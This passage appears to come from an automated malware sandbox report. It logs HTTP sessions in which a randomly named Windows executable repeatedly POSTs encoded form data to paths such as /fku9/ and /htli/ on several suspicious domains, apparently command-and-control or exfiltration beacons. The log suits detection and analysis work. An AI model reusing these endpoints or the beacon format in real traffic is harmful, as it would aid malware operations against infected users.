                                                          Data Raw: 31 48 67 3d 78 38 73 5a 69 7a 45 38 53 5a 74 33 50 44 49 61 64 63 44 79 75 39 78 70 34 32 48 62 77 48 69 73 6d 69 63 74 2b 4f 67 2f 7a 78 30 33 44 78 43 46 6a 41 55 31 38 4e 6a 64 51 4e 78 73 37 37 44 48 33 64 56 67 2b 34 51 63 47 58 50 52 55 6c 78 6b 66 42 52 74 61 4c 6f 6b 34 38 44 63 78 2f 69 44 6d 38 43 47 53 43 63 55 44 50 63 39 57 6b 6c 55 68 6a 6b 56 37 34 71 67 42 73 71 4f 50 76 61 5a 77 32 45 62 48 73 6f 38 53 77 4d 5a 56 57 4e 69 63 33 77 79 43 79 45 34 78 39 77 48 46 55 63 35 66 6a 79 56 5a 39 69 75 54 49 46 59 42 45 4c 58 70 37 30 4c 6c 51 6b 62 34 34 4e 75 37 42 58 35 66 6c 66 47 36 73 77 3d
                                                          Data Ascii: 1Hg=x8sZizE8SZt3PDIadcDyu9xp42HbwHismict+Og/zx03DxCFjAU18NjdQNxs77DH3dVg+4QcGXPRUlxkfBRtaLok48Dcx/iDm8CGSCcUDPc9WklUhjkV74qgBsqOPvaZw2EbHso8SwMZVWNic3wyCyE4x9wHFUc5fjyVZ9iuTIFYBELXp70LlQkb44Nu7BX5flfG6sw=
Jul 26, 2024 18:46:36.946926117 CEST  658                IN         HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:46:36 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Location: http://www.pqnqxn.xyz
                                                          X-Powered-By: PHP/7.4.6
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xsDhwv1f2OurgEQ9vtg7svDYI2W1TVhfwB953DZUDaMCKkfvHnnUBzaMoLqvI2hDc%2FwoS6qEaU2Y9E3%2F2ffcwuejPPZAS4z7gg5oLEu%2F%2BaOQWphwsDOSa48PQ%2Bk6T1Hbww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95dde66ebf32e4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.5  55144        104.21.59.240   80                7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp                             Bytes transferred  Direction  Data
Jul 26, 2024 18:46:38.724800110 CEST  727                OUT        POST /fku9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.pqnqxn.xyz
                                                          Origin: http://www.pqnqxn.xyz
                                                          Referer: http://www.pqnqxn.xyz/fku9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 38 73 5a 69 7a 45 38 53 5a 74 33 4e 6a 34 61 52 64 44 79 73 64 78 6d 6b 47 48 62 6c 33 69 6f 6d 6c 55 74 2b 4f 49 76 79 43 51 33 44 56 4b 46 69 42 55 31 39 4e 6a 64 66 74 78 6a 31 62 44 4f 33 64 70 6f 2b 39 77 63 47 58 72 52 55 6b 42 6b 66 32 74 79 59 62 6f 36 31 63 44 65 31 2f 69 44 6d 38 43 47 53 43 49 2b 44 50 45 39 57 30 56 55 67 43 6b 57 6c 49 71 6a 56 38 71 4f 5a 76 61 46 77 32 46 4d 48 70 49 61 53 32 41 5a 56 55 56 69 63 6c 49 78 58 43 45 79 38 64 78 55 44 6b 59 38 48 68 69 44 46 63 48 78 47 36 39 48 4a 53 6d 39 7a 5a 38 6a 32 77 49 6a 6f 72 46 5a 71 78 32 51 46 47 50 32 6b 37 6d 4d 31 76 31 75 46 4d 38 6f 34 53 44 69 65 48 58 35 4e 78 72 63
                                                          Data Ascii: 1Hg=x8sZizE8SZt3Nj4aRdDysdxmkGHbl3iomlUt+OIvyCQ3DVKFiBU19Njdftxj1bDO3dpo+9wcGXrRUkBkf2tyYbo61cDe1/iDm8CGSCI+DPE9W0VUgCkWlIqjV8qOZvaFw2FMHpIaS2AZVUViclIxXCEy8dxUDkY8HhiDFcHxG69HJSm9zZ8j2wIjorFZqx2QFGP2k7mM1v1uFM8o4SDieHX5Nxrc
Jul 26, 2024 18:46:39.405570984 CEST  652                IN         HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:46:39 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Location: http://www.pqnqxn.xyz
                                                          X-Powered-By: PHP/7.4.6
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9r5NqQUTnKJaNCQevAYVveAkTWIqFeikTPqZ%2Fd5km3JfozSrL5lfdJT3K0QNEjFJa4xIAHmFW2YvO4RkeyK%2BWX9Nr8pKmEgPOolulSNZxB3TAEpuIjK5oqlfoR2Ei84eHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95ddf67f4832e8-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.5  55145        104.21.59.240   80                7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp                             Bytes transferred  Direction  Data
Jul 26, 2024 18:46:41.296087980 CEST  1744               OUT        POST /fku9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.pqnqxn.xyz
                                                          Origin: http://www.pqnqxn.xyz
                                                          Referer: http://www.pqnqxn.xyz/fku9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 38 73 5a 69 7a 45 38 53 5a 74 33 4e 6a 34 61 52 64 44 79 73 64 78 6d 6b 47 48 62 6c 33 69 6f 6d 6c 55 74 2b 4f 49 76 79 43 59 33 41 69 4b 46 67 69 4d 31 76 39 6a 64 57 4e 77 6b 31 62 43 4d 33 64 78 73 2b 39 31 70 47 56 6a 52 55 43 56 6b 5a 48 74 79 43 4c 6f 36 38 38 44 64 78 2f 6a 42 6d 38 53 43 53 43 59 2b 44 50 45 39 57 79 52 55 6e 54 6b 57 6e 49 71 67 42 73 72 42 50 76 61 68 77 32 64 63 48 70 45 73 53 47 67 5a 57 30 46 69 65 57 77 78 56 69 45 38 2f 64 77 54 44 6c 6c 73 48 68 2b 50 46 63 6a 58 47 35 74 48 44 57 62 46 6a 4a 30 59 74 78 38 73 6d 4d 64 49 38 57 4b 77 46 56 2f 39 70 72 61 6a 70 65 74 6b 46 37 52 72 37 43 65 34 48 51 72 5a 4b 6d 4b 76 78 53 57 43 73 69 67 55 53 57 4b 6a 68 7a 71 57 7a 4b 49 4c 6a 74 53 38 54 6a 53 79 62 47 75 67 57 47 4c 7a 31 73 45 44 67 4a 45 4e 42 49 51 5a 4e 6a 38 55 4f 58 4f 54 66 66 49 74 75 44 71 44 75 50 6e 68 35 52 63 59 30 66 7a 4e 2b 74 37 6f 79 74 4e 73 61 64 42 72 5a 52 6c 53 76 55 49 76 6a 67 39 74 79 6a 7a 68 4b 4c 31 4f 61 49 53 75 55 49 [TRUNCATED]
                                                          Data Ascii: 1Hg=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 [TRUNCATED]
Jul 26, 2024 18:46:41.973759890 CEST  656                IN         HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:46:41 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Location: http://www.pqnqxn.xyz
                                                          X-Powered-By: PHP/7.4.6
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JruWZ3SJPznO7Wj6PTLihVExWcWVASERAnXVr77EcWakf8vxRJ2Viji%2FYfsMhMdYsAiwII6rNx8TWMchHoYuNJ38iHncClLwUsXbHVPTXxQU%2F1hZVDjbkka%2BSgN5aTa%2Faw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95de06893143a7-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.5  55146        104.21.59.240   80                7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp                             Bytes transferred  Direction  Data
Jul 26, 2024 18:46:43.892879009 CEST  464                OUT        GET /fku9/?1Hg=8+E5hHkJAI9KLzdnRfLjsdta627301LWvCxQnfER7jE6HhXelR0L8M6eacA5uvGu6fFFzcUJZ3XtElIgDxgrCowK6qnc0dbjxbukcDgECY4ZLyFshyoZroDOS+2pE7Poig==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.pqnqxn.xyz
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Jul 26, 2024 18:46:44.535300970 CEST  648                IN         HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:46:44 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Location: http://www.pqnqxn.xyz
                                                          X-Powered-By: PHP/7.4.6
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYyEzIg8jBPebwxFPUrF8jAzhy153V6KreN7guywwh6rEmsUtUyajZEllyjlf5m6weFlTdLSMpeoZThndxLcQkeWLNgzeIRLHv4O5j56EsXQsT7UisFozPJ9hKE1lhw1AQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95de16be078c33-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.5  55147        84.32.84.32     80                7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp                             Bytes transferred  Direction  Data
Jul 26, 2024 18:46:49.663841963 CEST  710                OUT        POST /htli/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.lovezi.shop
                                                          Origin: http://www.lovezi.shop
                                                          Referer: http://www.lovezi.shop/htli/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 49 68 76 44 4a 37 48 49 2b 37 31 71 77 75 32 6a 77 42 78 57 2b 42 4d 76 44 33 52 39 77 61 33 39 37 67 6d 55 4c 73 48 74 58 47 6f 59 56 6a 6c 6d 45 74 46 51 53 64 57 73 75 66 53 78 4c 56 66 79 74 70 33 62 70 4d 68 67 59 53 55 48 46 2f 75 54 6e 64 50 72 31 55 34 45 48 62 6e 4a 56 4b 47 4c 76 73 4a 75 39 66 33 35 75 66 43 31 66 42 66 6e 77 61 2b 7a 61 2b 6a 41 47 6d 47 33 59 50 66 69 42 54 62 77 45 53 53 38 61 39 4f 39 31 4f 2f 48 43 4a 6a 6c 4a 63 32 61 59 70 43 62 63 37 38 4f 79 36 49 38 4d 74 75 54 62 31 45 45 47 4b 75 6a 32 51 36 68 46 57 30 4f 6a 31 77 73 65 6a 4b 6b 77 65 63 2f 72 6c 63 3d
                                                          Data Ascii: 1Hg=IhvDJ7HI+71qwu2jwBxW+BMvD3R9wa397gmULsHtXGoYVjlmEtFQSdWsufSxLVfytp3bpMhgYSUHF/uTndPr1U4EHbnJVKGLvsJu9f35ufC1fBfnwa+za+jAGmG3YPfiBTbwESS8a9O91O/HCJjlJc2aYpCbc78Oy6I8MtuTb1EEGKuj2Q6hFW0Oj1wsejKkwec/rlc=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.5  55148        84.32.84.32     80                7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp                             Bytes transferred  Direction  Data
Jul 26, 2024 18:46:52.252620935 CEST  730                OUT        POST /htli/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.lovezi.shop
                                                          Origin: http://www.lovezi.shop
                                                          Referer: http://www.lovezi.shop/htli/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 49 68 76 44 4a 37 48 49 2b 37 31 71 77 4f 6d 6a 6a 53 70 57 32 42 4d 75 47 33 52 39 71 71 33 35 37 67 61 55 4c 74 7a 39 58 30 38 59 62 68 39 6d 48 73 46 51 56 64 57 73 68 2f 53 77 46 31 66 35 74 70 37 6c 70 4e 74 67 59 53 41 48 46 2f 65 54 6b 73 50 6b 36 6b 34 47 65 4c 6e 50 49 36 47 4c 76 73 4a 75 39 66 69 63 75 66 61 31 44 67 76 6e 78 2b 71 30 63 4f 6a 42 57 32 47 33 4c 66 66 6d 42 54 61 54 45 53 6a 54 61 2f 47 39 31 4c 54 48 44 59 6a 6b 48 63 33 52 63 70 44 4b 54 4c 68 6d 31 74 70 7a 41 74 58 5a 4e 44 63 66 48 38 44 4a 73 79 79 4a 57 32 59 32 7a 6d 34 62 50 54 72 4e 71 39 4d 50 31 79 4a 56 57 43 4b 4b 45 45 74 65 75 35 69 55 75 65 32 55 6a 45 6f 78
                                                          Data Ascii: 1Hg=IhvDJ7HI+71qwOmjjSpW2BMuG3R9qq357gaULtz9X08Ybh9mHsFQVdWsh/SwF1f5tp7lpNtgYSAHF/eTksPk6k4GeLnPI6GLvsJu9ficufa1Dgvnx+q0cOjBW2G3LffmBTaTESjTa/G91LTHDYjkHc3RcpDKTLhm1tpzAtXZNDcfH8DJsyyJW2Y2zm4bPTrNq9MP1yJVWCKKEEteu5iUue2UjEox


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.5  55149        84.32.84.32     80                7156  C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
Timestamp                             Bytes transferred  Direction  Data
Jul 26, 2024 18:46:54.828394890 CEST  1747               OUT        POST /htli/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.lovezi.shop
                                                          Origin: http://www.lovezi.shop
                                                          Referer: http://www.lovezi.shop/htli/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: 1Hg=IhvDJ7HI+71qwOmjjSpW2BMuG3R9qq357gaULtz9X0kYbQdmELRQUdWs/vS1F1fktpThpNxWYXEHFe+ThYTkt04GDbnOVKGkvqpi9fycufa1Djnnna+0HOjAGmG7YPfOBTDoETWsas+91vzHFrLkYM3TbpDSTLt51sAMAtj3NEwfFLqA8TK0Am0k3EQtO2GhlMkoozhPUjqFSiFblYr6yImDtw1jMsuKGUl/sl6DVHdBpX0szIgUroqfNwhlEcyKtiaO5Gb8JmGZUB2nzIzDZekeRyPpQd7s0H2MSLPBPdec6gEvnGDWcZLjOtd2Qk/hMJ1ix1/chbucBpmzsQ6pL8QBdsA9c9dogk6roj4SArxJr/fQUvHtWNdJAGzC5MoMb3iLOWAKYe8PRpr0B5yfpTYI1tRPWY1svMvrrCGr6ISXCv6JDFKH8Q5QNQfeEpXVQi75M3GO9qtOtueb+6alA7AW4UysgXUGNXtw/mIEWvUXbKAEAL79Dbm27Gk+EgNgF5gej9UCFD8RiXrNT2G/HT9LMrGUSOZCoJm3PJEc53T9DllRjN5OwP8GNafZHkpLPJ/q7PUMPFtJznk4W+Oq3AXHTphWc0qL9uXkdmAnbFRKfqxnkwCXgZw+QEmhVc5Nm/bRv2inkA9Sy4qp6fvGHBAuKMT7Sl3syzcaGRE66wcziF3AORPyNKFjoPK9Br08fN/9WhSumEmIwWgjVU6M+PP63v/mxK5HO07O4JxpbelpwKFZdrcX5LKQIUE+uk6/LZ0h/NQAGbcSJFnEaYucvALLq/hzmZp5D2aK2oQlVx4rD/Lxa0PAJ541KxGdOV8ZpwEra/vgLbGa9qrVL382IfITMZvlVRg6ssugKMOlDcRDOnEnIx+rv97S1iJXhs936KMa6yUnNPc4/6dhD9o+LdL3RYjecrcl37VeIm0IAErLxIW17AjKREUZ4ZHSZ69wqlo83U303n0dKxkyCkE5FCmVb0XLH/q8ESrIpvdcrC7+OINg [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.5 | 55150 | 84.32.84.32 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:46:57.405827999 CEST | 465 | OUT | GET /htli/?ejlto=QtkhctgpxJahPP0&1Hg=FjHjKNi/s/5kx+KnkSdD7DBcT3to66u90TWIQenAa0cXcBEeV9ZBFtbsq/uwbVXzm5/jkr9fdxMKasz/2IuVvEkWA5eWfr+6uK8ix+bvoaaPZEzC/cixV8fHHlKsAdCdfw== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.lovezi.shop
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:46:57.913244963 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: hcdn
                                                          Date: Fri, 26 Jul 2024 16:46:57 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 10072
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          alt-svc: h3=":443"; ma=86400
                                                          x-hcdn-request-id: d07cbaed975a03615debd6e1ee55e7cd-bos-edge1
                                                          Expires: Fri, 26 Jul 2024 16:46:56 GMT
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.5 | 55151 | 188.114.96.3 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:47:03.023267031 CEST | 734 | OUT | POST /qogc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.artfulfusionhub.lat
                                                          Origin: http://www.artfulfusionhub.lat
                                                          Referer: http://www.artfulfusionhub.lat/qogc/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: 1Hg=tQ2/zTKJJfjfIWKgL8ecpUL/XVO1UwHCkOVzzCD5EQe70OjOTS1Qm00PQQ2U8lcUANy4IJKOKWukPtg4x4LPG1idYRjnkeF2DD2cwf6qvEX2izz3tfU/cLq7aYj1iKkaWwGeH3yFgPZE2XL8JRJHquBK5m6242wa64mQyG+mIgsg5r5u9/jS+wuyebU+OnCWWwt1kY8=


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.5 | 55152 | 188.114.96.3 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:47:05.591670036 CEST | 754 | OUT | POST /qogc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.artfulfusionhub.lat
                                                          Origin: http://www.artfulfusionhub.lat
                                                          Referer: http://www.artfulfusionhub.lat/qogc/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: 1Hg=tQ2/zTKJJfjfJ2agKbyco0L8b1O1dQHGkORzzAvpHiK70s7OBAdQh00Pfw2NhVclAN+wIImOKXOkPoE42LzMHlifQxjlu+F2DD2cwf/PvA72iDD3/7g8Rrq0Koj116kWWwHzH1GjgNRE2VT8JE9AjuBM3G7/+Ude8bOs9W3gbixZ4dUEndr6tQCKOIcJfXj/MT9F6Ppsq/p16jp4RnVVtHz/MDnq
                                                          Jul 26, 2024 18:47:06.912610054 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://artfulfusionhub.lat/wp-json/>; rel="https://api.w.org/"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AI1M55TCg5bz0CP6bvjRaeKaBaNTeUnQUyDSAAZDD6wgnUR2XV6dfVpVcdasvqe3te3pU6SQSbHyar3WBq4FJrsn37%2Fym5ti4frKJgOdILvv3OoSDQvUddBRKkwDcR1WAnMdQFQMc6zjog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95de9e6a0217ed-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.5 | 55153 | 188.114.96.3 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:47:08.180576086 CEST | 1771 | OUT | POST /qogc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.artfulfusionhub.lat
                                                          Origin: http://www.artfulfusionhub.lat
                                                          Referer: http://www.artfulfusionhub.lat/qogc/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: 1Hg= [TRUNCATED]
                                                          Jul 26, 2024 18:47:09.166889906 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://artfulfusionhub.lat/wp-json/>; rel="https://api.w.org/"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vyx4OccAPKycjOy9lPhVF6kuv9neiD6ccNrXu9Yr46Izv%2Fef%2FzVCbdPC8AeCAq1vWwmdcjrLm0wsJHrW5c6ly2XGOOhd4sls5cOBHPlA%2FY5GJf2zrNMjSeRqC7LvXAbkXK7J4nxlRRFOLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95deae9caf4370-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
